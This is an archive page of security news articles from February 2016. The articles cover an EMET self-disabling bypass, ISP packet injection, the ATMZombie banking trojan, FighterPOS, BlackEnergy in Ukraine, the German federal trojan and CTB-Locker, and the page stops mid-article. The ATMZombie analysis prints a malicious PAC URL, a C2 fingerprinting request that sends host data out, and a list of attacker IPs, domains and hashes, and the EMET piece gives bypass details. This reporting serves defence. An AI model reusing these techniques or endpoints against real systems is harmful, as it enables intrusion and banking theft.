Articles 2016 February - English Press English Articles Page 1 2 3 4 5 6 2020 2019 2018 2017 2016 2015 2014 2013 2012
H Analysis Android Apple APT Attack BigBrothers BotNet Congress Crime Crypto Cryptocurrency Cyber CyberCrime CyberSpy CyberWar Exploit Forensics Hacking ICS Incindent iOS IT IoT Mobil OS Phishing Privacy Ransomware Safety Security Social Spam Virus Vulnerebility
Jednotlivé články jsou rozděleny podle měsíců a zde je najdete./The articles are broken down by month and can be found here.
2016 - January February March April May June July August September October November December
Using the Microsoft EMET security tool to hack itself
29.2.2016 Security
The security researchers at FireEye Abdulellah Alsaheel and Raghav Pande have found a way to exploit Microsoft EMET (Enhanced Mitigation Experience Toolkit) to hack itself.
The security researchers at FireEye security Abdulellah Alsaheel and Raghav Pande have found a way to exploit the Microsoft security tool Enhanced Mitigation Experience Toolkit to hack itself. The Enhanced Mitigation Experience Toolkit was introduced by Microsoft to raise the cost of exploit development, it cannot be considered a solution that is able to protect systems from any malicious exploit.
The experts elaborated a technique to disable the Microsoft Enhanced Mitigation Experience Toolkit using the tool itself.
The Enhanced Mitigation Experience Toolkit was designed to protect systems against attackers by identifying patterns of cyber attacks.
“EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and helps protect by diverting, terminating, blocking, and invalidating those actions and techniques. EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software.” is the description provided by Microsoft for its tool.
The Enhanced Mitigation Experience Toolkit works by injecting anti-malware library in into applications in the attempt of early detect any suspicious activity by hooking process in execution and analyzing any calls in critical APIs .
“EMET injects emet.dll or emet64.dll (depending upon the architecture) into every protected process, which installs Windows API hooks (exported functions by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks provide EMET the ability to analyze any code calls in critical APIs and determine if they are legitimate. If code is deemed to be legitimate, EMET hooking code jumps back into the requested API. Otherwise it triggers an exception.” wrote the security duo.
The researchers focused their efforts in disabling the Enhanced Mitigation Experience Toolkit, this means that an attacker could include in his application the code that invokes a function within the tool that disable it.
The exit “feature” is implemented in the emet.dll for cleanly exiting from a process.
“However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.”
The unique problem for the researchers was to retrieve the base address of emet.dll to invoke the function to arrest it. The experts used the GetModuleHandleW function that is not hooked by the Microsoft Enhanced Mitigation Experience Toolkit to retrieve the address.
This is not the first time that security experts find a way to bypass the Enhanced Mitigation Experience Toolkit, but differently from the past, the technique proposed by the duo doesn’t rely on vulnerabilities or missing features.
“This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is exported, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).” explained the security duo.
Chinese ISPs are redirecting users legitimate traffic to malicious sites/ads
29.2.2016 Virus
Chinese ISPs (internet service providers) are redirecting users legitimate traffic to malicious websites serving malware and ads.
China is know to be not very “ortodox” when talking about freedom on the internet, over the time, it developed numerous projects to monitor users’ activity. The Great Firewall
Now three Israeli researchers uncovered that Chinese ISPs (China Telecom and China Unicom) are injecting content into the users’ traffic.
The way these two Chinese ISPs pollute their client’s network was by setting up proxy servers that lead clients in advertisement links and malware.
When a user access a domain that is under one of these Chinese ISP’s, the altered packet redirects the users browser to parse the rogue network routes. The result is that the initial traffic will be redirected to malicious sites serving adversities and malware.
In their paper, the researchers detailed the tactics used to conduct such kind of attacks and how the IPSs monitor the network traffic for specific URLs altering the traffic.
The ISPs are using two injection techniques, the first one called Out of Band TCP Injection and the second its HTTP Injection.
In the Out of Band TCP Injection, the network operators send a forged packet without dropping the legitimate ones, this means that the ISP clones the legitimate traffic and send both legitimate and cloned traffic to the final destination.
The destination receives two traffic stream coming from the same source, the legit and the cloned one, but only one can arrive first, if the legit one wins the race nothing will happen and the users will be fine, but if the cloned one wins the race the user will be in serious problems.
The HTTP Injection works injecting false HTTP responses into the web client. The HTTP is a stateless client-server protocol that uses TCP as its transport.
An HTTP exchange begins by a client sending an HTTP request, usually to retrieve a resource indicated by a URI included in the request. After processing the request, the server sends an HTTP response with a status code. The user might get the following responses:
200 (Successful): The request was successfully received, understood, and accepted. Responses of this type will usually contain the requested resource.
302 (Redirection): The requested resource resides temporarily under a different URI. Responses of this type include a Location header field containing the different URI.
“An HTTP client will receive only one HTTP response for a given request even when a false HTTP response is injected because, as mentioned above, the TCP layer will only accept the first segment that it receive.”
The researchers collected evidence to discover the threat actor behind the forged packets.
They discovered a sort of dirty alliance between advertising sites and ISPs that working together can generate huge amounts of advertisement revenue and divide the profit.
During the investigation, the researchers detected massive amounts of traffic being redirected based on this partnership.
Even though this is happening in China, all users in the world can be affected by it, simply because if you want to access to websites hosted in China you will need to pass through Chinese ISPs before arriving the website, and you will have your traffic susceptible to be injected with ads or malware.
How to detect traffic changed/cloned by the Chinese ISPs?
IP identification
A forged packet is masqueraded as a legit packet but can be discovered by the time stamp in each packet, providing an evidence of being a rogue packet.
“We formulate the following rule to determine which of the two raced packets is the forged one: the forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets (except the raced one).”
TTL (Total Time to Live)
“The IP TTL value in a received packet is dependent on the initial value set by the sender and the number of hops the packet has traversed so far. Thus, it is unusual for packets of the same session to arrive at the client with different TTL values. Therefore, if the raced packets have different TTL values we can use them to distinguish between the two packets. From our observations, the injecting entity often made no attempt to make the TTL value of the forged packet similar to the TTL values of the other packets sent by the server. Similarly to the case of the IP identification rule above, we identify the forged packet using the following rule: the forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets. (except the raced one).”
Timing Analysis
“The race between the forged and legitimate packets can also be characterized by the difference in their arrival times. By arrival time we mean the time at which the packet was captured by the monitoring system. Since the system captures traffic at the entrance to the edge network close to the client, it is reasonable to assume that these times are very close to the actual arrival times at the end client. For each injection event we calculatethe difference between the arrival time of the legitimate packet and the arrival time of the forged packet. A negative difference means that the forged packet “won” the race, and a positive difference means that the legitimate packet “won”.”
How to mitigate the risk?
The best way to avoid this kind of attacks is to access websites supporting HTTPS, because in generally the malicious URLs are not SSL Shield, therefore the use of HTTPS by a website can block this type of attack.
ATMZombie: banking trojan in Israeli waters
29.2.2016 Zdroj: Kaspersky Virus
On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. It uses insidious injection and other sophisticated and stealthy methods. The first method, dubbed “proxy-changing”, is commonly used for HTTP packets inspections. It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.
Although this is efficient for testing, streaming bank details isn’t as easy. Banks are using encrypted channels, signed with authorized certificates, to prevent the data from being streamed in clear-text. The attackers, however, realized the missing piece and have since issued a certificate of their own, which is embedded in the dropper and is inserted in the root CA list of common browsers in the victim’s machine.
The method of using a “proxy-changer” Trojan to steal bank credentials has been around since the end of 2005, and is being actively used by Brazilian cybercriminals; however, it wasn’t until 2012 that Kaspersky Lab researchers compiled a full attack analysis. “In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.“, said Fabio Assolini, Senior Security Researcher at GReAT Kaspersky Lab, in his article.
A Kaspersky Lab researcher based in Russia had written about similar Trojan attacking PSB-retail customers, dubbed Tochechnyj Banker. It was even backed by a victim case study, where the victim explains how the crocks fooled him into handing out his credentials.
The incident Israeli banks experienced had the same characteristics, but had a very fascinating and innovative method of stealing the money. Instead of relying only on direct wire-transfer or trading credentials, their modus operandi started by leveraging a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM, assisting money mules (zombies) who are suspected to have no awareness of how the attack works; hence the Trojan was dubbed – ATMZombie.
The threat actor seems to be widely active in banking malware campaigns, as he was found to be registering domains for the following Trojans as well: Corebot, Pkybot and the recent AndroidLocker. However, none uses the same modus operandi. In addition, the actor is being tracked by a number of researchers and also runs rogue online services such as malware encryption and credit card dumps for sale.
Similar to the PSB-retail attack in 2012, the Retefe Banking Trojan, discovered by PaloAlto Networks last August, is quite like a big brother of ATMZombie. It contains an additional Smoke Loader backdoor, which ATMZombie lacks. The other similar banker is that identified by IBM Trusteer’s as Tsukuba.
The proxy configurations file must specifically detail the targets it is aiming at, thus it was fairly easy to spot them. The attack had successfully compromised hundreds of victim machines; however Kaspersky Lab was able to trace only a couple of dozen of them.
Bird view
The Trojan is dropped into the victim machine and starts the unpacking process. Once unpacked it stores certificates in common browsers (Opera, Firefox) and modifies their configurations to match a Man-In-The-Middle attack. It eliminates all possible proxies other than the malware’s and changes cache permissions to read-only. It than continues by changing registry entries with Base64 encoded strings that contain a path to the auto-configuration content (i.e. traffic capture conditions using CAP file syntax) and installs its own signed certificate into the root folder. Later it waits for the victim to login to their bank account and steals their credentials, logs in using their name and exploits the SMS feature to send money to the
Analysis
After loading the malware executable with your favorite assembler level analysis debugger, it is possible to capture the virtual allocation procedure occurring in run-time. Putting breakpoints in the right instruction points will disclose the unpacked executable. Once the final routine is done, the MZ header will appear in memory. There are many techniques and tools, but this method was enough to unpack the malware.
Looking into the malware assembly code, we were able to identify a number of strings that were embedded in the data section for a reason. The first we spotted was a Base64 string containing a chunk of an outbound communication URL, meant to be embedded in a number of registry entries.
The string decodes to:
http://retsback.com/config/cfg.pac
Side note: It is not the PAC file that is being embedded in the browser network configuration; thus we believe that it was generated by the attacker as a backup, in case the original PAC fails.
Two other Base64 strings we found were the PAC, which was embedded in the browser network configuration; and another type of URL, which indicated the type of lateral movement the threat actor chose.
The URL in the Base64 string was appended to an HTTP request which was detected as an attempt to fingerprint the sandbox. The empty parameters are fed with the Windows ProductID, the binary’s name and an integer between one and five. The integer is the level of integrity that the malware was assigned for; where (1) is untrusted level and (5) is system level. Along with those three dynamic values is a static version value.
GET
/z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1
Host: retsback.com
Cache-Control: no-cache
Inspecting the binary, we found that it uses a certificate to stream data over HTTPS and securely steal the victim’s credentials.
After embedding the above certificate and proxy configurations in the victim’s machine, the browser is set to route the communication via the attackers’ server when the victim decides to login to his bank.
The victim was not only lured into downloading the malware for being a client of Israeli banks, but was also targeted for being a client of a specific bank in Israel. This requires either very good intelligence-gathering techniques or an insider that can, legitimately or not, get a hold of the list of clients. When a list of that nature is being assembled, the hunt becomes very efficient and the attackers are able to craft each email or link to a specific victim or bank.
The following is a full pseudo code of the malware:
Stepping out of the rabbit hole
The malware is only the first step of the attack. The second step involves a manual login to the hijacked accounts and submission of a wire-transfer to the account of the money mule. This is a crucial step, since crossing this step means that the malware has successfully finished its role in the attack.
Logging manually into the victim’s bank account is not something to take lightly. Many banks around the world are fingerprinting devices to make sure that the user is logging in from a trusted machine. For untrusted machines, the bank will issue extended protection mechanisms to prevent the exact attack detailed in this article. In addition, banks track anomalies and send alerts to its information security personnel.
Before victims get to the phase where they call the bank’s support team to declare that money has gone missing, the attacker issues a money transfer to the money mule’s cell phone number and Israeli Personal Identifiable Information (PII). We dubbed the money mule “Zombie”, as part of an investigation in which he found that youngsters were lured into withdrawing cash from the ATMs, in return for receiving a small amount of it. Later, they sent the rest of the money via different media, such as a post office. The campaign was named after the money mules and the technique they were instructed to use.
The technique allowed the attackers to stay anonymous and supervise the entire campaign remotely. It also points to a new type of attack, where attackers control residents of a country to operate as an insider and deliver a basic service. This service might cause its executor to be accused for committing a crime; however, the chance of proving that they were aware of the entire operation is close to none. After all, they are not doing anything malicious.
From reading the bank’s instruction, a non-registered user can study the five-year old feature and analyze the possibility of including it in the attack as a way to wire money. This feature is called “SMS transaction”; and it has been widely used for the past few years, allowing parents, for example, to send money to kids who have no credit card, while they serve in the military or study at school.
Along with a few more unique details, such as Date, Israeli ID, Name and Amount the owner of the phone will be provided with an SMS message that authorizes the cash withdraw.
Kaspersky Lab found an innovative way to protect against the proxy-changer that has existed for several years. It can be found here.
Israeli banks involved in the incident successfully stopped the attack using, among other data, the information they received from Kaspersky Lab regarding the attacker, the malicious activity and the victims.
FAQs
Q: Was the attack targeted at Israeli banks?
A: Yes
Q: Was money stolen from the banks or from victims’ accounts?
A: The money was stolen from victims’ accounts, but the bank compensated each victim. In conclusion, the bank was the one to lose revenue.
Q: Was the attack stopped completely?
A: As far as we know, the banks were able to stop the attack completely and compensate the victims.
Q: How many victims were in the attack?
A: The Kaspersky Security Network (KSN) showed dozens of victims; however, we estimate that the total number of victims reached a couple of hundreds.
Q: How much money was stolen?
A: The highest amount for one transaction was approximately 750$. We were able to find a number of money mules, about 10 different malicious binaries, and a number of banks who were victims of this attack. With this information we estimate that hundreds of thousands of dollars were stolen in this short period of time. If not for the vast investigation led, among others, by Kaspersky Lab, the amounts stolen could have soared to much larger numbers.
Q: Were the police part of the investigation?
A: We are not aware of any investigation details.
Q: In regards to attribution, who is the attacker?
A: Kaspersky Lab does not seek attribution; however, the company’s researchers have sent all the information to law enforcement to help in catching the criminals behind the campaign.
Q: What can I do to stay protected?
A: Make sure you have anti-malware product installed and install the latest patches.
IPs
91.230.211.206
185.86.77.153
91.215.154.90
88.214.236.121
Domains
retsback.com
updconfs.com
systruster.com
msupdcheck.com
Samples
6d11090c78e6621c21836c98808ff0f4 Trojan-Banker.Win32.Capper.zym
4c5b7a8187475be251d05655edcaccbe Trojan-Banker.Win32.Capper.zyt
c0201ab2a45bc0e17ebd186059d5a59e Trojan-Banker.Win32.Capper.zyk
47b316e3227d618089eb1625c4202142 Trojan-Banker.Win32.Capper.zyl
84bb5a77e28b3539a8022bc3612d4f4c PAC file example
d2bf165284ab1953a96dfa7b642637a8 Trojan-Banker.Win32.Capper.zyp
80440e78a68583b180ad4d3e9a676a6e Trojan-Banker.Win32.Capper.zyq
d08e51f8187df278296a8c4ff5cff0de Trojan-Banker.Win32.Capper.zyg
efa5ea2c511b08d0f8259a10a49b27ad Trojan-Banker.Win32.Capper.zys
13d9352a27b626e501f5889bfd614b34 Trojan-Banker.Win32.Capper.zyf
e5b7fd7eed59340027625ac39bae7c81 Trojan-Banker.Win32.Capper.zyj
The new FighterPOS PoS Malware implements worm capabilities
29.2.2016 Virus
The threat actors behind the FighterPOS PoS malware have added worm capabilities to their malicious code that is now targeting systems in the United States.
PoS malware represents a serious threat to several industries, from retail to the hotel industry. During the last twelve months, security experts have discovered a significant number of payment card frauds involving the PoS malware. PoS malware is a very effective weapon in the arsenal of cyber criminals;
In April 2015, security experts at Trend Micro discovered a new family of PoS malware, dubbed FighterPOS, that infected the systems of more than 100 organizations in Brazil allowing crooks to steal more than 22,000 unique credit card records.
FighterPOS was offered for sale for more than $5,000 worth of Bitcoins, it is now spreading also outside the Brazil, researchers at TrendMicro reported that the number of infections in the US now represents 6 percent of the total, up from 1 percent reported in April 2015.
Cyber criminals have started targeting the United States, the researchers detected new samples of the FighterPOS malware that include strings written in English, instead of Portuguese used in Brazil.
“It is also interesting to note that based on the analysis of their code, the new FighterPOS samples have strings of code written in English, instead of Portuguese. This leads us to speculate that whoever is behind the new versions are operating in English-speaking countries, and are shifting to target other countries like the United States. ” states the analysis published by TrendMicro.
The malware researchers discovered two new strains of the FighterPOS malware called TSPY_POSFIGHT.F and WORM_POSFIGHT.SMFLK. The WORM_POSFIGHT.SMFLK, also known as “Floki Intruder,” in more sophisticated respect the TSPY_POSFIGHT.F, it has the ability to the firewall, User Account Control (UAC) and other Windows protections and it is able to detect the presence of security products using Windows Management Instrumentation (WMI).
The lightweight FighterPOS variant, the TSPY_POSFIGHT.F, doesn’t act as a backdoor and is not able to receive commands. It has been designed to send back to C&C the payment card logs collected by other PoS malware.
The Floki Intruder is spread through websites compromised by attackers, it could be updated receiving packages from the command and control (C&C) servers.
The most interesting improvement for the new strain of the FighterPOS malware is the implementations of worm capabilities. The Floki Intruder variant is able to locate other PoS systems on the same network and infect them. The malware enumerates logical drives and drops copies of itself along with
The malware enumerates logical drives and drops copies of itself and an autorun.inf file using the WMI. The autorun.inf allows the execution of the malware when the logical drive is accessed.
“Perhaps the most notable update Floki Intruder has from FighterPOS is that it is able to enumerate logical drives to drop copies of itself and an autorun.inf by using WMI. Adding this routine, in a way, makes sense: given that it is quite common for PoS terminals to be connected in one network, a propagation routine will not only enable the attacker to infect as many terminals as possible with the least amount of effort, it will also make this threat more difficult to remove because reinfection will occur as long as at least one terminal is affected.” states the analysis.
A journalist has been hacked on a plane while writing an Apple-FBI story
29.2.2016 Apple
The journalist Steven Petrow had his computer hacked while on a plane, it was a shocking experience that raises the discussion on privacy.
Experts in the aviation industry are spending a significant effort in the attempt of improving cyber security. The news that I’m going to tell you has something of incredible.
The American journalist and author Steven Petrow, who is now writing for USA Today explained that he was contacted by a fellow passenger on an American Airline flight from North Carolina to Dallas, who told him that he accessed his email account.
American-Airlines privacy hacking
“I don’t really need to worry about online privacy,” wrote Petrow. “I’ve got nothing to hide. And who would want to know what I’m up to, anyway?
Petrow is a journalist, not an investigative reporter and is not involved in any specific investigation, so the interest of the alleged hacker appeared very strange to him.
Petrow was writing an article on the “Apple vs FBI” case while he was on the plane, but another passenger was well informed about the work of the journalist.
After the plane landed, the journalist was leaving the plane when a fellow in the same row asked to speak with him.
“I need to talk to you.” the man said. “You’re a reporter, right?” “Wait for me at the gate.”
The journalist waited for the fellow passenger and when met him at the gate asked to explain.
“How did you know I was a reporter?” the journalists asked.
“Are you interested in the Apple/FBI story?” replied the man ignoring the question,
“I hacked your email on the plane and read everything you sent and received. I did it to most people on the flight.”
As a proof of the hack, the fellow passenger cited the exact content of one the mail he received while in flight.
“One of my emails was pretty explicit about the focus of my story and I had emailed Bruce Schneier, a security expert who had previously written in the Washington Post about this very issue.” wrote Petrow.
During the flight, Petrow worked on the article and sent and received several email messages through the American Airlines Gogo in-flight Internet connection.
The Gogo wireless is American Airlines free internet service provided to passengers. When passengers use it are advised to avoid transmitting sensitive data, but most of the passengers still ignore the risks.
The Gogo service operates in the same ways as most open Wi-Fi hotspots, this means that is important avoid sharing sensitive data while accessing it. on the ground.
Gogo recommends the use of a virtual private network for sending sensitive data, but of course, the journalist ignored this best practice.
The fellow passenger explained the journalist the risks for connecting to open networks.
“That’s how I know you’re interested in the Apple story,” he continued. “Imagine if you had been doing a financial transaction. What if you were making a date to see a whore?”
“That’s why this story is so important to everyone,” he told Petrow. “It’s about everyone’s privacy.”
The man then went away, but the event upset the reporter. His privacy had been violated, the same that happens every day to millions of unaware users.s
“For me, I felt as though the stranger on the plane had robbed me of my privacy—as was explicitly his intent. He took the decision of what to share out of my hands. He went in through the back door of the Gogo connection.
A DHS report confirms the use of BlackEnergy in the Ukrainian outage, still unknown its role
28.2.2016 Hacking
A report issued by the DHS CERT confirms that the outage in Ukraine was caused by a well-coordinated attack still unclear the BlackEnergy role.
In December, a major outage hit a region in Ukraine, more than 225,000 customers were affected by the interruption of the electricity. Security experts speculate the involvement of Russian nation-state actors that have used the BlackEnergy to infect SCADA systems of Ukrainian grid and critical infrastrcuture.
According to a Ukrainian media TSN, the power outage was caused by the destructive malware that disconnected electrical substations. The experts speculate that hackers run a spear phishing campaign across the Ukrainian power authorities to spread the BlackEnergy malware leveraging on Microsoft Office documents.
Now a new report published by the DHS Industrial Control Systems Cyber Emergency Response Team confirms that the outage was caused by a cyber attack.
The report is based on interviews with operations and IT staff at six Ukrainian organizations involved in the attacks. The thesis has been supported first by the SANS industrial control systems team, but it is still unclear the real impact of the BlackEnergy malware of the incident.
The SANS report reported that attackers flooded the call centers at the power authorities with phone calls, the intent of the attackers was to prevent customers from reporting the incident to the companies operating the critical infrastructure.
The DHS report highlights the possibility that the two strains of malware were used by the attackers after the outage in an attempt either to destroy evidence the intrusion or make recovery more difficult.
“Following these discussions and interviews, the team assesses that the outages experienced on December 23, 2015, were caused by external cyber-attackers. The team was not able to independently review technical evidence of the cyber-attack; however, a significant number of independent reports from the team’s interviews as well as documentary findings corroborate the events as outlined below.” states the report.
“Through interviews with impacted entities, the team learned that power outages were caused by remote cyber intrusions at three regional electric power distribution companies (Oblenergos) impacting approximately 225,000 customers.”
“The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.
All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. In addition, the actors reportedly scheduled disconnects for server Uninterruptable Power Supplies (UPS) via the UPS remote management interface. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts.”
The report confirmed that every company victim of the attack was infected with the BlackEnergy malware, but avoided to provide further details on the role played by the malware.
“Each company also reported that they had been infected with BlackEnergy malware; however, we do not know whether the malware played a role in the cyber-attacks. The malware was reportedly delivered via spear phishing emails with malicious Microsoft Office attachments. It is suspected that BlackEnergy may have been used as an initial access vector to acquire legitimate credentials; however, this information is still being evaluated. It is important to underscore that any remote access Trojan could have been used and none of BlackEnergy’s specific capabilities were reportedly leveraged.”
German authorities approve the use of home-made Federal Trojan
28.2.2016 Virus
The German Interior Ministry has approved the use of a federal Trojan developed by the German Federal Criminal Police.
The German Interior Ministry has approved the use a spyware developed by the German Federal Criminal Police, aka the ‘federal Trojan’ or Bundestrojaner, for the investigative purpose.
“Soon the state could re-enter the computer of suspicious citizens. The Bundeskriminalamt has had to develop their own Trojan horse that should receive the application approval in the coming weeks, as the Germany radio has been confirmed. The Chaos Computer Club and Green remain skeptical whether the new software meets the requirements of the Federal Constitutional Court.” reports the Deutschlandfunk.
The German Federal Criminal Police completed the development of the malware in autumn 2015, it allows investigators to spy on suspects’ phone calls, emails, chats, and access files and sensitive data stored on the mobile devices. The federal Trojan is also able to record video or audio from the surrounding environment.
The authorities can now use the federal Trojan under a court order, the spyware could be used in any investigation on individuals involved in a crime threatening citizens’ “life, limb or liberty.”
Experts from the German Chaos Computer Club (CCC) expressed their concern for the Federal Trojan, Frank Rieger, a spokesman for the organizations, highlights the abilities of the malware of setting up a video or audio surveillance.
In 2011, the experts at Chaos Computer Club analyzed another sample of the Federal Trojan. The experts discovered that the spyware had the ability to set up a backdoor on the suspect’s machine and spy on surround environment via camera and microphone. The ministers of several German states admitted the use of the malware and explained that the malware analyzed by the CCC was a beta version of a spyware created by the German firm DigiTask. The spyware was rejected by authorities because it implemented many surveillance operations instead the only telecommunication surveillance.
The experts at CCC speculates that the so-called Federal Trojan is dangerous for citizens, in fact, it could be easy that also innocent users fall victims of the surveillance activities operated by the authorities.
Another aspect highlighted by privacy advocates is the way such kind of malware is developed, the authors of the spyware need to access zero-day exploit to compromise suspects’ devices, but this implies that authorities will not share such knowledge within the IT community putting citizens at risk.
The Deutschlandfunk also confirmed that German police also use other spyware, including the infamous FinFisher malware developed by Gamma International.
“The Bundeskriminalamt had a software ordered parallel to the self-development even in a controversial company to source telecommunication surveillance. According to the BKA, the adaptation of the product is FinFisher the German-British company Elaman / Gamma International is not yet complete, however, is to be promoted following the own development.” states Deutschlandfunk.
Chinese ISPs Caught Injecting Ads and Malware into Web Pages
27.2.2016 Virus
China has gained a considerable global attention when it comes to their Internet policies in the past years; whether it's introducing its own search engine dubbed "Baidu," Great Firewall of China, its homebrew China Operating System (COP) and many more.
Along with the developments, China has long been criticized for suspected backdoors in its products: Xiaomi and Star N9500 smartphones are top examples.
Now, Chinese Internet Service Providers (ISPs) have been caught red-handed for injecting Advertisements as well as Malware through their network traffic.
Three Israeli researchers uncovered that the major Chinese-based ISPs named China Telecom and China Unicom, two of Asia's largest network operators, have been engaged in an illegal practice of content injection in network traffic.
Chinese ISPs had set up many proxy servers to pollute the client's network traffic not only with insignificant advertisements but also malware links, in some cases, inside the websites they visit.
If an Internet user tries to access a domain that resides under these Chinese ISPs, the forged packet redirects the user's browser to parse the rogue network routes. As a result, the client's legitimate traffic will be redirected to malicious sites/ads, benefiting the ISPs.
Here's How Malware and Ads are Injected
In the research paper titled 'Website-Targeted False Content Injection by Network Operators,' the Israeli researchers wrote that the tactic has now expanded to core ISPs – the Internet companies that interconnect edge ISPs with the rest of the ISPs globally.
These ISPs have set up specialized servers that monitor network traffic for specific URLs and move to alter it, no matter the end users are their customers or not.
Methods of Injection:
Various methods had been adopted by ISPs to infiltrate the legitimate traffic. Some of them are:
1- Out of Band TCP Injection
Unlike in the past when ISPs modified network packages to inject ads, the network operators send the forged packets without dropping the legitimate ones.
Interestingly, instead of interception or rewriting of network packets, cloning of HTTP response packets had been adopted by ISPs to replicate the infection. The ISP clones the legitimate traffic, modifies the clone, and then sends both packets to the desired destination.
So ultimately, there are 2 packet responses generated for a single request. Hence, there is a chance of forged packet to win the race, while legit packet reaches at last.
Since the cloned traffic will not always arrive at the end users before the legitimate one, the injected traffic is harder to detect.
But a serious analysis with netsniff-ng would knock out the fake packets.
2) HTTP Injection
HTTP is a stateless client-server protocol that uses TCP as its transport. As TCP only accepts the initial packet upon its receival and discards the second, there is a chance to receive the fake packet in first place; if infection had been taken place.
Here, the user might get a response with HTTP Status Number 302 (Redirection) instead of HTTP Status Number 200 (OK) and would be re-routed to the other non-legit links.
How to Identify Rogue Packets?
1) IP Identification
IP identification value does contains a counter that is sequentially incremented after each sent the packet.
The forged packet returns soon after making a request that masquerades as a legit packet. But the time stamp in each packet would provide enough evidence to eliminate the rogue packet.
The forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets
2) TTL (Total Time to Live)
Each received packet contains an initial value set by sender that calculates the number of hops covered by the packet during the transmission.
If packet is received with different number of hop counts, then it would clearly draws a line between the legit and illegit ones.
The forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets
3) Timing Analysis
Time stamp in the packet captured by the monitoring systems at the entrance to the Edge network would figure out the genuinity.
The data packet with apparent time close proximity would differentiate the legitimate packets from the forged packets with unmatched arrival time.
List of the Infection Groups
In general, 14 different ISPs had been discovered with malicious background, and out of these 10 are from China, 2 from malaysia, and 1 each from India and United States.
Following are the injection groups and their characteristics:
1. Hao – Referred the user to hao123.com itself, but using an HTTP 302 response mechanism to infect users.
2. GPWA – The genuine website of Gambling had been forged to another web domain which intelligently redirects the traffic to 'qpwa' (sometimes, public would not find the difference between 'q' and 'g').
The forged content here includes a JavaScript that refers to a resource having the same name as the one originally requested by the user, but the forged resource is located at qpwa.org registered to a Romanian citizen.
3. Duba Group – The injections in this group add to the original content of a website a colorful button that prompts the victim to download an executable from a link at the domain duba.net.
The executable is flagged as malicious by several antivirus vendors.
4. Mi-img – In these injected sessions, the client, which appears to be an Android device, tries to download an application. The redirected response navigates into an online bot database that had been identified by a BotScout lookup.
5. Server Erased – In this group, the injections were identical to the legitimate response but the original value of the HTTP header 'Server' is changed.
Motive Behind the Attack
Both the advertising agencies and the ISPs are benefited by redirecting user's traffic to the corresponding sites.
This practice would mark an increase in advertisement revenue and other profits to advertisers and ISPs.
During their research, the researchers logged massive amounts of Web traffic and detected around 400 injection incidents based on this technique.
Most of these events happened with ISPs in China and far east countries, even if the traffic originated from Western countries, meaning a German user accessing a website hosted in China is also susceptible to having his/her traffic injected with ads or malware.
How to Mitigate?
Since the companies that engage in such practices are edge ISPs - the final network providers that connect users to the Internet, users can change their Internet provider.
However, the simplest way to combat this issue is for website operators to support HTTPS for their services, as all the websites that infect users are SSL-less.
The sites that supply malicious URLs are not guarded by SSL Shield, making them vulnerable to carry out the illegit things.
Therefore, usage of HTTPS-based websites would block such kinds of attacks, so users are advised only to stick to SSL sites.
Delivering the illegit content, or redirecting the crowd to stash the cash would end up losing the public trust on the technologies.
CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers
27.2.2016 Virus
In last few years, we saw an innumerable rise in ransomware threats ranging from Cryptowall to Locky ransomware discovered last week.
Now, another genre of ransomware had been branched out from the family of CTB-Locker Ransomware with an update to infect "Websites".
The newly transformed ransomware dubbed "CTB-Locker for Websites" exclusively hijacks the websites by locking out its data, which would only be decrypted after making a payment of 0.4 BTC.
This seems to be the very first time when any ransomware has actually defaced a website in an attempt to convince its administrator to comply with the ransom demand.
However, the infected website admins can unlock any 2 files by the random generator for free as a proof of decryption key works.
Here's How CTB-Locker for Websites Ransomware Works
The CTB-Locker ransomware replaces the index page (the original index.php or index.html) of the servers hosting websites with the attacker's defacement page (a new affected index.php).
The defacement page serves a message informing the site owners that their files have been encrypted, and they need to pay a ransom before a certain deadline.
Once encrypted, the compromised websites display the following message:
"Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site."
The message also contains a step-by-step guide that helps the CTB-Locker victims to make the payment to a specific Bitcoin address.
FREE Key to Decrypt Any 2 Random Files
Soon after gaining the website control, the ransomware attacker submits two different AES-256 decryption keys to the affected index.php.
The first key would be used to decrypt any 2 random files from the locked files for free under the name of "test" which are chosen to demonstrate the decryption procedure.
